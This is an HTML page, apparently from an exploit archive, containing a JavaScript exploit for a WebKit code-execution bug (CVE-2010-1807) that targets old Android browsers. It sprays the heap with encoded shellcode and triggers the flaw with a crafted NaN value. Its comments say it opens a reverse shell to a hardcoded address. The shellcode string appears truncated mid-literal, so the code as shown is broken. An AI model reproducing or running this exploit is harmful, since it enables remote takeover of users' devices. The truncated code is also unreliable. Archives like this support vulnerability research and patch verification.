Vulmon
<html>
<head>
<script>
// bug = webkit code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807
// listed as a safari bug but also works on android :)
//tested = moto droid 2.0.1 , moto droid 2.1 , emulater 2.0 - 2.1
//patched= android 2.2
//author = mj
// hardcoded to return a shell to 10.0.2.2 port 2222
//
function sploit(pop)
{
var span = document.createElement("div");
document.getElementById("pwn").appendChild(span);
span.innerHTML = pop;
}
function heap()
{
var scode = unescape("\u3c84057\u3c80057\u3c7c057\u3c78057\u3c74057\u3c70057\u3c6c057\u3c68057\u3c64057\u3c60057\u3c5c057\u3c58057\u3c54057\u3c50057\u3c4c057\u3c48057\u3c44057\u3c40057\u3c3c057\u3c38057\u3c34057\u3c30057\u3c2c057\u3c28057\u3c24057\u3c20057\u3c1c057\u3c18057\u3c14057\u3c10057\u3c0c057\u3c08057\u3c04057\u3bfc057\u3bfc057\u3bf8057\u3bf4057\u3bf0057\u3bec057\u3be8057\u3be4057\u3be0057\u3bdc057\u3bd8057\u3bd4057\u3bd0057\u3bcc057\u3bc8057\u3bc4057\u3bc0057\u3bbc057\u3bb8057\u3bb4057\u3bb0057\u3bac057\u3ba8057\u3ba4057\u3ba0057\u3b9c057\u3b98057\u3b94057\u3b90057\u3b8c057\u3b88057\u3b84057\u3b80057\u3b7c057\u3b78057\u3b74057\u3b70057\u3b6c057\u3b68057\u3b64057\u3b60057\u3b5c057\u3b58057\u3b54057\u3b50057\u3b4c057\u3b48057\u3b44057\u3b40057\u3b3c057\u3b38057\u3b34057\u3b30057\u3b2c057\u3b28057\u3b24057\u3b20057\u3b1c057\u3b18057\u3b14057\u3b10057\u3b0c057\u3b08057\u3b04057\u3afc057\u3afc057\u3af8057\u3af4057\u3af0057\u3aec057\u3ae8057\u3ae4057\u3ae0057\u3adc057\u3ad8057\u3ad4057\u3ad0057\u3acc057\u3ac8057\u3ac4057\u3ac0057\u3abc057\u3ab8057\u3ab4057\u3ab0057\u3aac057\u3aa8057\u3aa4057\u3aa0057\u3a9c057\u3a98057\u3a94057\u3a90057\u3a8c057\u3a88057\u3a84057\u3a80057\u3a7c057\u3a78057\u3a74057\u3a70057\u3a6c057\u3a68057\u3a64057\u3a60057\u3a5c057\u3a58057\u3a54057\u3a50057\u3a4c057\u3a48057\u3a44057\u3a40057\u3a3c057\u3a38057\u3a34057\u3a30057\u3a2c057\u3a28057\u3a24057\u3a20057\u3a1c057\u3a18057\u3a14057\u3a10057\u3a0c057\u3a08057\u3a04057\u39fc057\u39fc057\u39f8057\u39f4057\u39f0057\u39ec057\u39e8057\u39e4057\u39e0057\u39dc057\u39d8057\u39d4057\u39d0057\u39cc057\u39c8057\u39c4057\u39c0057\u39bc057\u39b8057\u39b4057\u39b0057\u39ac057\u39a8057\u39a4057\u39a0057\u399c057\u3998057\u3994057\u3990057\u398c057\u3988057\u3984057\u3980057\u397c057\u3978057\u3974057\u3970057\u396c057\u3968057\u3964057\u3960057\u395c057\u3958057\u3954057\u3950057\u394c057\u3948057\u3944057\u3940057\u393c057\u3938057\u3934057\u3930057\u392c057\u3928057\u3924057\u3920057\u391c057\u3918057\u3914057\u3910057\u390c057\u3908057\u3904057\u38fc057\u38fc057\u38f8057\u38f4057\u38f0057\u38ec057\u38e8057\u38e4057\u38e0057\u38dc057\u38d8057\u38d4057\u38d0057\u38cc057\u38c8057\u38c4057\u38c0057\u38bc057\u38b8057\u38b4057\u38b0057\u38ac057\u38a8057\u38a4057\u38a0057\u389c057\u3898057\u3894057\u3890057\u388c057\u3888057\u3884057\u3880057\u387c057\u3878057\u3874057\u3870057\u386c057\u3868057\u3864057\u3860057\u385c057\u3858057\u3854057\u3850057\u384c057\u3848057\u3844057\u3840057\u383c057\u3838057\u3834057\u3830057\u382c057\u3828057\u3824057\u3820057\u381c057\u3818057\u3814057\u3810057\u380c057\u3808057\u3804057\u37fc057\u37fc057\u37f8057\u37f4057\u37f0057\u37ec057\u37e8057\u37e4057\u37e0057\u37dc057\u37d8057\u37d4057\u37d0057\u37cc057\u37c8057\u37c4057\u37c0057\u37bc057\u37b8057\u37b4057\u37b0057\u37ac057\u37a8057\u37a4057\u37a0057\u379c057\u3798057\u3794057\u3790057\u378c057\u3788057\u3784057\u3780057\u377c057\u3778057\u3774057\u3770057\u376c057\u3768057\u3764057\u3760057\u375c057\u3758057\u3754057\u3750057\u374c057\u3748057\u3744057\u3740057\u373c
do {
scode += scode;
} while(scode.length < 0x1000);
target = new Array();
for(i = 0; i < 1000; i++)
target[i] = scode;
for (i = 0; i <= 1000; i++)
{
if (i>999)
{
sploit(-parseFloat("NAN(ffffe00572c60)"));
}
document.write("The targets!! " + target[i]);
document.write("<br />");
}
}
</script>
</head>
<body id="pwn">
woot
<script>
heap();
</script>
</body>
</html>
<p>